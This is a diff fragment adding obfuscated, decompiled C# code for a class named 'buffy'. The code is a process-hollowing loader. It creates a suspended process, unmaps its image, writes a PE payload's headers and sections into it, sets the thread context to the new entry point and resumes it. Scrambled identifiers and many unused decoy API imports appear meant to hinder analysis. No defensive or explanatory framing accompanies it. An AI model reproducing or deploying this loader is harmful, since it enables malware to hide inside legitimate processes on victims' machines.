+    object[] Arguments = objArray3;
+    bool[] flagArray = new bool[2]{ true, false };
+    bool[] CopyBack = flagArray;
+    object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
+    if (flagArray[0])
+      NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
+      {
+        RuntimeHelpers.GetObjectValue(objArray3[0])
+      }, (string[]) null, (Type[]) null, true, false);
+    buffy.DOS_Header dosHeader2;
+    buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
+    NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
+    buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
+    buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
+    buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
+    buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
+    buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
+    buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
+    buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
+    buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
+    buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
+    string DASDAS3E2_1 = VVVVVVCAE;
+    object obj6 = obj3;
+    buffy.Security_Flags securityFlags1;
+    buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
+    ref buffy.Security_Flags local1 = ref securityFlags2;
+    object obj7 = obj4;
+    buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
+    ref buffy.Security_Flags local2 = ref securityFlags3;
+    IntPtr num1;
+    IntPtr DSA43R3W1 = num1;
+    object obj8 = obj2;
+    buffy.Startup_Information startupInformation1;
+    buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
+    ref buffy.Startup_Information local3 = ref startupInformation2;
+    object obj9 = obj1;
+    buffy.Process_Information processInformation1;
+    buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
+    ref buffy.Process_Information local4 = ref processInformation2;
+    int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
+    object obj10 = (object) processInformation2;
+    object Instance4 = (object) startupInformation2;
+    object obj11 = (object) securityFlags3;
+    object obj12 = (object) securityFlags2;
+    if (-((uint) num2 > 0U ? 1 : 0) == 0)
+      return;
+    buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
+    IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
+    object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
+    buffy.NT_Headers ntHeaders2;
+    buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
+    NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
+    {
+      (object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
+    }, (string[]) null, (Type[]) null);
+    NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
+    {
+      (object) 65539
+    }, (string[]) null, (Type[]) null);
+    if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
+      return;
+    buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
+    string DASDAS3E2_2 = VVVVVVCAE;
+    object obj13 = obj12;
+    securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
+    ref buffy.Security_Flags local5 = ref securityFlags2;
+    object obj14 = obj11;
+    securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
+    ref buffy.Security_Flags local6 = ref securityFlags3;
+    IntPtr DSA43R3W2 = num1;
+    object obj15 = Instance4;
+    startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
+    ref buffy.Startup_Information local7 = ref startupInformation2;
+    object obj16 = obj10;
+    processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
+    ref buffy.Process_Information local8 = ref processInformation2;
+    int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
+    object Instance5 = (object) processInformation2;
+    object obj17 = (object) startupInformation2;
+    object obj18 = (object) securityFlags3;
+    object obj19 = (object) securityFlags2;
+    if (-((uint) num3 > 0U ? 1 : 0) == 0)
+      return;
+    buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
+    object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
+    object obj21 = Instance1;
+    buffy.Context context1;
+    buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
+    ref buffy.Context local9 = ref context2;
+    int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
+    object Instance6 = (object) context2;
+    buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
+    object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
+    int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
+    long num5;
+    int num6 = checked ((int) num5);
+    ref int local10 = ref num6;
+    int num7 = 0;
+    ref int local11 = ref num7;
+    int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
+    long num9 = (long) num6;
+    buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
+    object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
+    int AL8ZCRFWNU1 = checked ((int) num9);
+    long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
+    buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
+    object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
+    int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
+    int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
+    uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
+    if (num11 == 0U)
+      return;
+    buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
+    object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
+    int AL8ZCRFWNU2 = checked ((int) num11);
+    byte[] DSAE32_1 = DAS4DA3;
+    int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
+    uint num12;
+    int num13 = checked ((int) num12);
+    ref int local12 = ref num13;
+    int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
+    uint num15 = checked ((uint) num13);
+    long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
+    int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
+    int num18 = 0;
+    while (num18 <= num17)
+    {
+      ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
+      buffy.Section_Header sectionHeader1;
+      object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
+      buffy.Section_Header sectionHeader2;
+      sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
+      byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
+      int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
+      int index = 0;
+      while (index <= num19)
+      {
+        numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
+        checked { ++index; }
+      }
+      buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
+      object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+      IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
+      int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
+      byte[] DSAE32_2 = numArray;
+      int da22S3 = checked ((int) sectionHeader1.DA22S3);
+      int num20 = checked ((int) num15);
+      ref int local13 = ref num20;
+      int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
+      num15 = checked ((uint) num20);
+      checked { ++num18; }
+    }
+    object bytes = (object) BitConverter.GetBytes(num11);
+    buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
+    object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
+    int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
+    byte[] DSAE32_3 = (byte[]) bytes;
+    int num22 = checked ((int) num15);
+    ref int local14 = ref num22;
+    int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
+    num12 = checked ((uint) num22);
+    NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
+    {
+      (object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
+    }, (string[]) null, (Type[]) null);
+    buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
+    object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
+    object obj29 = Instance6;
+    context2 = obj29 != null ? (buffy.Context) obj29 : context1;
+    ref buffy.Context local15 = ref context2;
+    int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
+    object obj30 = (object) context2;
+    buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
+    object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
+    IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
+    int num25 = (int) ws2XvbnvO9_2(DASEAS);
+  }
+
+  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+  public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
+
+  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+  public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
+
+  [DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RpcNsProfileEltAdd(
+    long ProfileNameSyntax,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
+    ref IntPtr IfId,
+    long MemberNameSyntax,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
+    long Priority,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
+
+  [DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
+
+  [DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
+
+  [DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MgmGetNextMfeStats(
+    ref IntPtr pimmStart,
+    ref long pdwBufferSize,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
+    ref long pdwNumEntries);
+
+  [DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MprAdminDeviceEnum(
+    ref IntPtr hMprServer,
+    long dwLevel,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
+    ref long lpdwTotalEntries);
+
+  [DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long MsiDatabaseImport(
+    ref IntPtr hDatabase,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
+
+  [DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetReplExportDirSetInfo(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
+    long level,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
+    ref long parm_err);
+
+  [DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long NetUseGetInfo(
+    ref IntPtr UncServerName,
+    ref IntPtr UseName,
+    long level,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
+
+  [DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadConsoleInput(
+    long hConsoleInput,
+    ref IntPtr lpBuffer,
+    long nLength,
+    ref long lpNumberOfEventsRead);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
+
+  [DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SnmpMgrCtl(
+    ref IntPtr session,
+    long dwCtlCode,
+    ref long lpvInBuffer,
+    long cbInBuffer,
+    ref long lpvOUTBuffer,
+    long cbOUTBuffer,
+    ref long lpcbBytesReturned);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long AddAuditAccessAceEx(
+    IntPtr pAcl,
+    long dwAceRevision,
+    long AceFlags,
+    long dwAccessMask,
+    ref IntPtr pSid,
+    long bAuditSuccess,
+    long bAuditFailure);
+
+  [DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SQLInstallerError(
+    int iError,
+    ref long pfErrorCode,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
+    int cbErrorMsgMax,
+    ref int pcbErrorMsg);
+
+  [DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
+
+  [DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RasSetCredentials(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
+    ref IntPtr TLPRASCREDENTIALSA,
+    long @bool);
+
+  [DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadConsole(
+    long hConsoleInput,
+    ref long lpBuffer,
+    long nNumberOfCharsToRead,
+    ref long lpNumberOfCharsRead,
+    ref long lpReserved);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadEncryptedFileRaw(
+    ref IntPtr pfExportCallback,
+    ref long pvCallbackContext,
+    ref long pvContext);
+
+  [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReadPrinter(
+    long hPrinter,
+    ref long pBuf,
+    long cdBuf,
+    ref long pNoBytesRead);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long ReleaseSemaphore(
+    long hSemaphore,
+    long lReleaseCount,
+    ref long lpPreviousCount);
+
+  [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
+
+  [DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long GetStringTypeEx(
+    long Locale,
+    long dwInfoType,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
+    long cchSrc,
+    ref int lpCharType);
+
+  [DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long GetVolumePathName(
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
+    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
+    long cchBufferLength);
+
+  [DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
+
+  [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
+
+  [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
+  private static extern IntPtr ToAscii(
+    long uVirtKey,
+    long uScanCode,
+    ref byte lpbKeyState,
+    ref long lpwTransKey,
+    long fuState);
+
+  private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
+
+  public struct Context
+  {
+    public uint II69TOHMUR;
+    public uint d2;
+    public uint das;
+    public uint d9;
+    public uint ad;
+    public uint dsa;
+    public uint ds;
+    public buffy.Save Save;
+    public uint dh;
+    public uint sad;
+    public uint da;
+    public uint MD;
+    public uint RD;
+    public uint mSI;
+    public uint WDA;
+    public uint AD3;
+    public uint D21;
+    public uint AS4;
+    public uint K32;
+    public uint F2W;
+    public uint HHJ;
+    public uint ADF5;
+    public uint GSSA;
+    public uint DSAAA;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
+    public byte[] er6rgdr65;
+  }
+
+  public struct Save
+  {
+    public uint KD7JX2MXT;
+    public uint JCNS3ZPSXO;
+    public uint DAS3;
+    public uint DAS23;
+    public uint ADSA;
+    public uint DAF35;
+    public uint FA32D;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
+    public byte[] FSDRF43;
+    public uint FA32QA;
+  }
+
+  public struct Misc
+  {
+    public uint SDUHRL;
+    public uint GSIJ;
+  }
+
+  public struct Section_Header
+  {
+    public byte FSDPOU4PO3;
+    public buffy.Misc Mi2sc;
+    public uint AL8ZCRFWNU;
+    public uint DA22S3;
+    public uint PoinEEter;
+    public uint E2Q4RS;
+    public uint FS523QF;
+    public uint FSB43FSD4;
+    public uint QBFAS4E;
+    public uint AS32QFZS;
+  }
+
+  public struct Process_Information
+  {
+    public IntPtr DAS4QQW;
+    public IntPtr RFSER;
+    public int TGJWE;
+    public int SDFFFFFFFFFF;
+  }
+
+  [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+  public struct Startup_Information
+  {
+    public int CSZE;
+    public string FSDR4G;
+    public string AAAAAAAAAA;
+    public string AADDDDDDD;
+    public int ADA;
+    public int C;
+    public int AEDS;
+    public int DASDDDD;
+    public int XASE4;
+    public int DAS3EDFZ;
+    public int DVA3ES;
+    public int CCCCQ;
+    public short FDSRS;
+    public short VYE5X;
+    public int KHJKIHJK;
+    public int KHJKHJK;
+    public int KHJKHJ;
+    public int KHJKJHK;
+  }
+
+  public struct Security_Flags
+  {
+    public int GFSETWE;
+    public IntPtr EWEWWW;
+    public int DASDAS;
+  }
+
+  public struct DOS_Header
+  {
+    public ushort DASDASFASF;
+    public ushort QWEQWE;
+    public ushort EQWEQWEQWE;
+    public ushort HFGHFGHFGH;
+    public ushort HFGHFGHFG;
+    public ushort DASD444444;
+    public ushort DASFASE33;
+    public ushort DASKGHJ;
+    public ushort DASVZDF;
+    public ushort VXCVXC;
+    public ushort VXCVXCV;
+    public ushort EWECS;
+    public ushort EWADC;
+    public ushort UADA3;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
+    public ushort[] ReservWWWWWWWWWWWWWWWedA;
+    public ushort DAS4E;
+    public ushort UJJ;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
+    public ushort[] DDDDDDDDD;
+    public int DASE3ASDAS;
+  }
+
+  public struct NT_Headers
+  {
+    public uint SSSSSSSSSSSQ;
+    public buffy.File_Header DSEEEEE;
+    public buffy.Optional_Headers OOOU;
+  }
+
+  public struct File_Header
+  {
+    public ushort ITTTTTTTT;
+    public ushort DAAAAAAAA3;
+    public uint HRFTYTYTR;
+    public uint GJGFSFS;
+    public uint FSVGY;
+    public ushort FSFV;
+    public ushort A34FFC;
+  }
+
+  public struct Optional_Headers
+  {
+    public ushort WWWWWWWWW;
+    public byte MaAAAAAAAAAAAjor;
+    public byte MiSSSSSSSSSSSnor;
+    public uint SSSSSSSSSSSSS;
+    public uint FFFFFFFFFFF;
+    public uint XXXXXXXX;
+    public uint DDDDDDDDAAA;
+    public uint FSSSSSSS;
+    public uint RSFS43;
+    public uint DFAZDASD;
+    public uint SectionA;
+    public uint FileA;
+    public ushort GDFTDFFFF;
+    public ushort HGDFHD564;
+    public ushort GD5ERGD;
+    public ushort FSD5YHD;
+    public ushort ASDASG;
+    public ushort AS4ASAS;
+    public uint CCC;
+    public uint DASRDASRASR;
+    public uint WQDASDASD;
+    public uint Assssssss;
+    public ushort fsd4s;
+    public ushort fjio;
+    public uint dasrlajstpoi;
+    public uint dasdraskyjhuasp;
+    public uint SHRedas4wa9uqserve;
+    public uint fsdtsysyt;
+    public uint eawdasdas3;
+    public uint Cocccunt;
+    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
+    public buffy.Data_Directory[] GSDGSDT4;
+  }
+
+  public struct Data_Directory
+  {
+    public uint ewq34q234;
+    public uint das34aw33;
+  }
+
+  public delegate bool GN04L0ER8I(
+    string ASFASE3,
+    string DASDAS3E2,
+    ref buffy.Security_Flags DASCASE,
+    ref buffy.Security_Flags CASE222,
+    bool DAS432E,
+    uint AEDFKJK32,
+    IntPtr DSA43R3W,
+    string ase32ew,
+    [In] ref buffy.Startup_Information das43fsa,
+    out buffy.Process_Information das3);
+
+  public delegate bool ZGOQ8VM05M(
+    IntPtr DASE32,
+    int AL8ZCRFWNU,
+    byte[] DSAE32,
+    int DASEADAS,
+    out int ASD43FA);
+
+  public delegate int Q7QRRP639W(
+    IntPtr FASFDASDAS,
+    int AL8ZCRFWNU,
+    ref int CAS32,
+    int ASDASC,
+    ref int CASTWE);
+
+  public delegate IntPtr W6CTR6GLCC(
+    IntPtr DASE43E,
+    int AL8ZCRFWNU,
+    uint DASCAS3,
+    uint DAS3,
+    uint DAS32);
+
+  public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
+
+  public delegate uint WS2XVBNVO9(IntPtr DASEAS);
+
+  public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
+
+  public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
+}